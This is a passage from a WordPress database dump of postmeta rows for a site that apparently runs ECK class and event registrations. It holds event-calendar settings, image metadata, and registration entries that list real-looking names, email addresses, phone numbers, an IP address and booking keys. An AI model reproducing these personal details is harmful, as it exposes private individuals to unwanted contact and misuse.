,(192914,269147,'mec_in_days',''),(192915,269147,'mec_not_in_days',''),(192916,269147,'mec_hourly_schedules','a:0:{}'),(192917,269147,'mec_booking','a:19:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(192918,269147,'mec_tickets','a:0:{}'),(192919,269147,'mec_fees_global_inheritance','1'),(192920,269147,'mec_fees','a:0:{}'),(192921,269147,'mec_ticket_variations_global_inheritance','1'),(192922,269147,'mec_ticket_variations','a:0:{}'),(192923,269147,'mec_reg_fields_global_inheritance','1'),(192924,269147,'mec_reg_fields','a:0:{}'),(192925,269147,'mec_bfixed_fields','a:0:{}'),(192926,269147,'mec_op','a:0:{}'),(192927,269147,'mec_fields','a:0:{}'),(192928,269147,'mec_notifications','a:4:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:16:\"certificate_send\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Event Attendee Certificates\";s:7:\"content\";s:252:\"<p>Hi %%name%%,</p>\r\n<p>Congratulations for successfully attending / completing the event %%event_title%%.<br />\r\nClick the following link to download or print your PDF certificate.</p>\r\n<p>%%certificate_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(192929,269147,'mec_event_status','EventScheduled'),(192930,269147,'mec_moved_online_link',''),(192931,269147,'mec_cancelled_reason',''),(192932,269147,'mec_display_cancellation_reason_in_single_page',''),(192933,269147,'protect_children',''),(192934,269147,'passster_activate_global_protection',NULL),(192935,269147,'passster_activate_protection',NULL),(192936,269147,'passster_protection_type','password'),(192937,269147,'boldgrid_hide_page_title','0'),(192938,269147,'_thumbnail_id','269148'),(192952,269147,'_dp_original','266311'),(192940,269147,'boldgrid_in_page_containers','1'),(192941,269147,'passster_area_shortcode',''),(192942,269147,'mec_cost_auto_calculate','0'),(192943,269147,'mec_style_per_event','global'),(192944,269147,'mec_trailer_url',''),(192945,269147,'mec_trailer_title',''),(192946,269147,'mec_start_datetime','2023-10-29 10:30 AM'),(192947,269147,'mec_end_datetime','2023-10-29 11:30 AM'),(193126,269160,'mec_cost',''),(193127,269160,'mec_currency','a:0:{}'),(193128,269160,'mec_additional_organizer_ids','a:0:{}'),(193129,269160,'mec_additional_location_ids','a:0:{}'),(193130,269160,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-10-12\";s:4:\"hour\";s:1:\"6\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-10-12\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(193131,269160,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(193132,269160,'mec_certain_weekdays','a:0:{}'),(193133,269160,'mec_allday','0'),(193134,269160,'one_occurrence','0'),(193135,269160,'mec_hide_time','0'),(193136,269160,'mec_hide_end_time','0'),(193137,269160,'mec_comment',''),(193138,269160,'mec_timezone','global'),(193139,269160,'mec_countdown_method','global'),(193140,269160,'mec_public','1'),(193105,269157,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:19:\"lynnie626@gmail.com\";s:4:\"name\";s:12:\"Lynn Gardner\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:14:\"172.58.109.156\";}}'),(193106,269157,'mec_price','0'),(193107,269157,'mec_payable','0'),(193108,269157,'mec_local_timezone','America/Chicago'),(193109,269158,'_field_654','Laurah'),(193110,269158,'_field_652','Brock Young'),(193111,269158,'_field_653','laurahbrockyoung@gmail.com'),(193112,269158,'_field_651','(602) 799-7974'),(193113,269158,'_field_656','The ECK Satsang Discourses  Second Series - STARTS IN NOVEMBER -- 2nd Wednesday at 700 pm - Zoom'),(193114,269158,'_field_649',''),(193115,269158,'_form_id','61'),(193116,269158,'_seq_num','32'),(193117,269160,'protect_children',''),(193118,269160,'mec_color',''),(193119,269160,'mec_location_id','187'),(193120,269160,'mec_dont_show_map','0'),(193121,269160,'mec_organizer_id','1'),(193122,269160,'mec_read_more',''),(193123,269160,'mec_more_info',''),(193124,269160,'mec_more_info_title',''),(193125,269160,'mec_more_info_target','_self'),(193084,269156,'_seq_num','31'),(193085,269157,'mec_transaction_id','SOM97240'),(193086,269157,'mec_gateway','MEC_gateway_free'),(193087,269157,'mec_gateway_label','Free'),(193088,269157,'mec_user_id','1000012'),(193089,269157,'mec_verified','1'),(193090,269157,'mec_verification_key','5206e3e7410353795278e48a60ca10d6'),(193091,269157,'mec_cancellation_key','932df012463216c5721eb4aaf3070cff'),(193092,269157,'mec_confirmed','1'),(193093,269157,'mec_event_id','269109'),(193094,269157,'mec_date','1696761000:1696764600'),(193095,269157,'mec_ticket_id',',1,'),(193096,269157,'mec_booking_time','2023-10-03 14:30:06'),(193097,269157,'mec_all_dates','a:0:{}'),(193098,269157,'mec_other_dates','a:0:{}'),(193099,269157,'mec_attention_time','1696761000:1696764600'),(193100,269157,'mec_attention_time_start','1696761000'),(193101,269157,'mec_attention_time_end','1696764600'),(193102,269157,'mec_book_date_submit','20231003143006'),(193103,269157,'mec_booking_location','129'),(193104,269157,'mec_ticket_price_1','0'),(193059,269153,'_form_id','61'),(193060,269153,'_seq_num','28'),(193061,269154,'_field_654','Joan'),(193062,269154,'_field_652','Riester'),(193063,269154,'_field_653','joanieriester@gmail.com'),(193064,269154,'_field_651','(719) 338-4544'),(193065,269154,'_field_656','The Master 4 Discourses - STARTS IN NOVEMBER -- 2nd Sunday at 845  1000 am - Temple-Hybrid'),(193066,269154,'_field_649','I previously registered for this class.  Just wanted to make sure I am on the list to attend.\nThanks,\nJoanie'),(193067,269154,'_form_id','61'),(193068,269154,'_seq_num','29'),(193069,269155,'_field_654','Susan'),(193070,269155,'_field_652','FRANCIS'),(193071,269155,'_field_653','Suelf8@gmail.com'),(193072,269155,'_field_651','(760) 300-9410'),(193073,269155,'_field_656','The Master 2 Discourses - STARTS IN NOVEMBER -- 2nd Wednesday at 730 pm - Zoom'),(193074,269155,'_field_649',''),(193075,269155,'_form_id','61'),(193076,269155,'_seq_num','30'),(193077,269156,'_field_654','Cindy'),(193078,269156,'_field_652','Francis'),(193079,269156,'_field_653','jcfrancis2@aol.com'),(193080,269156,'_field_651','(402) 201-8008'),(193081,269156,'_field_656','The Easy Way Discourses - STARTS IN NOVEMBER -- 2nd Tuesday at 700 pm - Zoom'),(193082,269156,'_field_649',''),(193083,269156,'_form_id','61'),(189187,268860,'mec_repeat_end_at_occurrences',''),(189186,268860,'mec_repeat_end',''),(189185,268860,'mec_repeat_interval','1'),(189138,268266,'_edit_last','2'),(186573,268440,'mec_cost_auto_calculate','0'),(186574,268440,'mec_style_per_event','global'),(186575,268440,'mec_trailer_url',''),(186576,268440,'mec_trailer_title',''),(186577,268440,'mec_start_datetime','2023-05-28 12:00 PM'),(186578,268440,'mec_end_datetime','2023-05-28 01:20 PM'),(186579,268440,'mec_sequence','1'),(186580,268440,'mec_event_gallery','a:0:{}'),(186581,268440,'mec_related_events','a:0:{}'),(186582,268440,'mec_banner','a:0:{}'),(186583,267570,'passster_area_shortcode',''),(189137,268266,'folders_file_replaced','1690730823'),(186585,268266,'_edit_lock','1690731617:2'),(186586,268266,'passster_area_shortcode',''),(186588,268735,'_field_224','John'),(186589,268735,'_field_225','Seville'),(186590,268735,'_field_226','john.seville@ascentleadershipgroup.com'),(186591,268735,'_field_227','CO'),(186592,268735,'_field_228','US'),(186593,268735,'_field_229','a:3:{i:0;s:16:\"Colorado Springs\";i:1;s:39:\"Central Colorado/ECK Temple in Colorado\";i:2;s:8:\"Loveland\";}'),(186594,268735,'_form_id','21'),(186595,268735,'_seq_num','178'),(186596,268736,'protect_children',''),(186597,268736,'mec_color',''),(186598,268736,'mec_location_id','122'),(186599,268736,'mec_dont_show_map','0'),(186600,268736,'mec_organizer_id','1'),(186601,268736,'mec_read_more',''),(186602,268736,'mec_more_info',''),(186603,268736,'mec_more_info_title',''),(186604,268736,'mec_more_info_target','_self'),(186605,268736,'mec_cost',''),(186606,268736,'mec_currency','a:0:{}'),(186607,268736,'mec_additional_organizer_ids','a:0:{}'),(186608,268736,'mec_additional_location_ids','a:0:{}'),(186609,268736,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-08-05\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:2:\"45\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-08-05\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:11:\"custom_days\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(186610,268736,'mec_repeat','a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:11:\"custom_days\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(186611,268736,'mec_certain_weekdays','a:0:{}'),(186612,268736,'mec_allday','0'),(186613,268736,'one_occurrence','0'),(186614,268736,'mec_hide_time','0'),(186615,268736,'mec_hide_end_time','0'),(186616,268736,'mec_comment',''),(186617,268736,'mec_timezone','global'),(186618,268736,'mec_countdown_method','global'),(186619,268736,'mec_public','1'),(186620,268736,'mec_start_date','2023-08-05'),(186621,268736,'mec_start_time_hour','8'),(186622,268736,'mec_start_time_minutes','45'),(186623,268736,'mec_start_time_ampm','AM'),(186624,268736,'mec_start_day_seconds','31500'),(186625,268736,'mec_end_date','2023-08-05'),(186626,268736,'mec_end_time_hour','10'),(186627,268736,'mec_end_time_minutes','0'),(186628,268736,'mec_end_time_ampm','PM'),(186629,268736,'mec_end_day_seconds','79200'),(186630,268736,'mec_repeat_status','1'),(186631,268736,'mec_repeat_type','custom_days'),(186632,268736,'mec_repeat_interval','1'),(186633,268736,'mec_repeat_end','never'),(186634,268736,'mec_repeat_end_at_occurrences','9'),(186635,268736,'mec_repeat_end_at_date',''),(186636,268736,'mec_advanced_days','a:0:{}'),(186637,268736,'mec_in_days','2023-08-06:2023-08-06:09-00-AM:12-00-PM'),(186638,268736,'mec_not_in_days',''),(186639,268736,'mec_hourly_schedules','a:0:{}'),(186640,268736,'mec_booking','a:27:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:24:\"bookings_payable_inherit\";s:1:\"1\";s:16:\"bookings_payable\";s:3:\"100\";s:21:\"bookings_payable_type\";s:7:\"percent\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(186641,268736,'mec_tickets','a:0:{}'),(186642,268736,'mec_fees_global_inheritance','1'),(186643,268736,'mec_fees','a:0:{}'),(186644,268736,'mec_ticket_variations_global_inheritance','1'),(186645,268736,'mec_ticket_variations','a:0:{}'),(186646,268736,'mec_reg_fields_global_inheritance','1'),(186647,268736,'mec_reg_fields','a:0:{}'),(186648,268736,'mec_bfixed_fields','a:0:{}'),(186649,268736,'mec_op','a:0:{}'),(186650,268736,'mec_fields','a:0:{}'),(186651,268736,'mec_event_status','EventScheduled'),(186652,268736,'mec_moved_online_link',''),(186653,268736,'mec_cancelled_reason',''),(186654,268736,'mec_display_cancellation_reason_in_single_page',''),(186655,268736,'boldgrid_hide_page_title','0'),(186656,268736,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(186657,268736,'passster_activate_global_protection',NULL),(186658,268736,'passster_activate_protection',NULL),(186659,268736,'passster_protection_type','password'),(186673,268736,'_dp_original','266104'),(186661,268736,'boldgrid_in_page_containers','1'),(186662,268736,'passster_area_shortcode',''),(186663,268736,'mec_cost_auto_calculate','0'),(186664,268736,'mec_style_per_event','global'),(186665,268736,'mec_trailer_url',''),(186666,268736,'mec_trailer_title',''),(186667,268736,'mec_start_datetime','2023-08-05 08:45 AM'),(186668,268736,'mec_end_datetime','2023-08-05 10:00 PM'),(186669,268736,'mec_sequence','32'),(186670,268736,'mec_event_gallery','a:0:{}'),(186671,268736,'mec_related_events','a:0:{}'),(186672,268736,'mec_banner','a:0:{}'),(186674,268736,'_edit_lock','1691169452:2'),(186675,268736,'_edit_last','2'),(186679,268737,'original-file','2023/06/2023-Reg-SA-1-updraft-pre-smush-original.jpg'),(186676,268737,'_wp_attached_file','2023/06/2023-Reg-SA-1.jpg'),(186677,268737,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:766;s:6:\"height\";i:452;s:4:\"file\";s:25:\"2023/06/2023-Reg-SA-1.jpg\";s:8:\"filesize\";i:98503;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"2023-Reg-SA-1-332x196.jpg\";s:5:\"width\";i:332;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17306;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"2023-Reg-SA-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7135;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:25:\"2023-Reg-SA-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23253;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:25:\"2023-Reg-SA-1-500x452.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:452;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:57879;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:25:\"2023-Reg-SA-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:37429;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:25:\"2023-Reg-SA-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25572;}s:8:\"tileview\";a:5:{s:4:\"file\";s:25:\"2023-Reg-SA-1-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28059;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(186690,268737,'folders_file_replaced','1688144712'),(186680,268737,'smush-complete','1'),(186681,268737,'smush-info','The file was compressed from 103.54 KB to 98.71 KB saving 4.67 percent using WP-Optimize'),(186682,268737,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:106022;s:12:\"smushed-size\";i:101074;s:15:\"savings-percent\";d:4.6699999999999999289457264239899814128875732421875;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:106022;s:10:\"compressed\";i:101074;}s:6:\"medium\";a:2:{s:8:\"original\";i:15559;s:10:\"compressed\";i:15349;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:6994;s:10:\"compressed\";i:6928;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:23032;s:10:\"compressed\";i:22713;}s:12:\"thumbrelated\";a:2:{s:8:\"original\";i:56540;s:10:\"compressed\";i:55851;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:36467;s:10:\"compressed\";i:35969;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:25028;s:10:\"compressed\";i:24693;}s:8:\"tileview\";a:2:{s:8:\"original\";i:28371;s:10:\"compressed\";i:28049;}}}'),(186711,268742,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:119375;s:12:\"smushed-size\";i:113457;s:15:\"savings-percent\";d:4.95999999999999996447286321199499070644378662109375;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:119375;s:10:\"compressed\";i:113457;}s:6:\"medium\";a:2:{s:8:\"original\";i:22902;s:10:\"compressed\";i:22288;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:10067;s:10:\"compressed\";i:10001;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:31617;s:10:\"compressed\";i:30718;}s:12:\"thumbrelated\";a:2:{s:8:\"original\";i:75239;s:10:\"compressed\";i:72882;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:48614;s:10:\"compressed\";i:47103;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:33859;s:10:\"compressed\";i:32845;}s:8:\"tileview\";a:2:{s:8:\"original\";i:37847;s:10:\"compressed\";i:36887;}}}'),(186712,268743,'mec_color',''),(186713,268743,'mec_location_id','122'),(186714,268743,'mec_dont_show_map','0'),(186715,268743,'mec_organizer_id','1'),(186716,268743,'mec_read_more',''),(186717,268743,'mec_more_info',''),(186718,268743,'mec_more_info_title',''),(186719,268743,'mec_more_info_target','_self'),(186720,268743,'mec_cost',''),(186721,268743,'mec_currency','a:0:{}'),(186722,268743,'mec_additional_organizer_ids','a:0:{}'),(186723,268743,'mec_additional_location_ids','a:0:{}'),(186724,268743,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-07-23\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-07-23\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(186708,268742,'original-file','2023/06/2023-Reg-SA-5-updraft-pre-smush-original.jpg'),(186709,268742,'smush-complete','1'),(186710,268742,'smush-info','The file was compressed from 116.58 KB to 110.80 KB saving 4.96 percent using WP-Optimize'),(186707,268736,'_thumbnail_id','268750'),(186691,268737,'_edit_lock','1688144793:2'),(186692,268737,'passster_area_shortcode',''),(186705,268742,'_wp_attached_file','2023/06/2023-Reg-SA-5.jpg'),(186706,268742,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:766;s:6:\"height\";i:452;s:4:\"file\";s:25:\"2023/06/2023-Reg-SA-5.jpg\";s:8:\"filesize\";i:119375;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"2023-Reg-SA-5-332x196.jpg\";s:5:\"width\";i:332;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22902;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"2023-Reg-SA-5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10067;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:25:\"2023-Reg-SA-5-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31617;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:25:\"2023-Reg-SA-5-500x452.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:452;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:75239;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:25:\"2023-Reg-SA-5-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:48614;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:25:\"2023-Reg-SA-5-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:33859;}s:8:\"tileview\";a:5:{s:4:\"file\";s:25:\"2023-Reg-SA-5-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:37847;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(186725,268743,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(186726,268743,'mec_certain_weekdays','a:0:{}'),(186727,268743,'mec_allday','0'),(186728,268743,'one_occurrence','0'),(186729,268743,'mec_hide_time','0'),(186730,268743,'mec_hide_end_time','0'),(186731,268743,'mec_comment',''),(186732,268743,'mec_timezone','global'),(186733,268743,'mec_countdown_method','global'),(186734,268743,'mec_public','1'),(186735,268743,'mec_start_date','2023-07-23'),(186736,268743,'mec_start_time_hour','10'),(186737,268743,'mec_start_time_minutes','30'),(186738,268743,'mec_start_time_ampm','AM'),(186739,268743,'mec_start_day_seconds','37800'),(186740,268743,'mec_end_date','2023-07-23'),(186741,268743,'mec_end_time_hour','11'),(186742,268743,'mec_end_time_minutes','30'),(186743,268743,'mec_end_time_ampm','AM'),(186744,268743,'mec_end_day_seconds','41400'),(186745,268743,'mec_repeat_status','0'),(186746,268743,'mec_repeat_type',''),(186747,268743,'mec_repeat_interval','1'),(186748,268743,'mec_repeat_end',''),(186749,268743,'mec_repeat_end_at_occurrences',''),(186750,268743,'mec_repeat_end_at_date',''),(186751,268743,'mec_advanced_days','a:0:{}'),(186752,268743,'mec_in_days',''),(186753,268743,'mec_not_in_days',''),(186754,268743,'mec_hourly_schedules','a:0:{}'),(186755,268743,'mec_booking','a:27:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:24:\"bookings_payable_inherit\";s:1:\"1\";s:16:\"bookings_payable\";s:3:\"100\";s:21:\"bookings_payable_type\";s:7:\"percent\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(186756,268743,'mec_tickets','a:0:{}'),(186757,268743,'mec_fees_global_inheritance','1'),(186758,268743,'mec_fees','a:0:{}'),(186759,268743,'mec_ticket_variations_global_inheritance','1'),(186760,268743,'mec_ticket_variations','a:0:{}'),(186761,268743,'mec_reg_fields_global_inheritance','1'),(186762,268743,'mec_reg_fields','a:0:{}'),(186763,268743,'mec_bfixed_fields','a:0:{}'),(186764,268743,'mec_op','a:0:{}'),(186765,268743,'mec_fields','a:0:{}'),(186766,268743,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br 